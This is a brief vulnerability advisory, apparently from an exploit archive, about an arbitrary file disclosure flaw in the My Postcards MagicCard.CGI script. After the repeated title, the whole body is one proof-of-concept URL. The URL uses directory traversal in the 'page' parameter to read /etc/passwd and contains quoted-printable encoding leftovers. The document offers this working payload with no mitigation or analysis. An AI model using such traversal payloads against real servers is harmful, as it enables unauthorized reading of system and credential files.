My Postcards MagicCard.CGI Arbitrary File Disclosure Vulnerability

My Postcards MagicCard.CGI Arbitrary File Disclosure Vulnerability

The following proof of concept has been made available:

http://www.example.com/cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd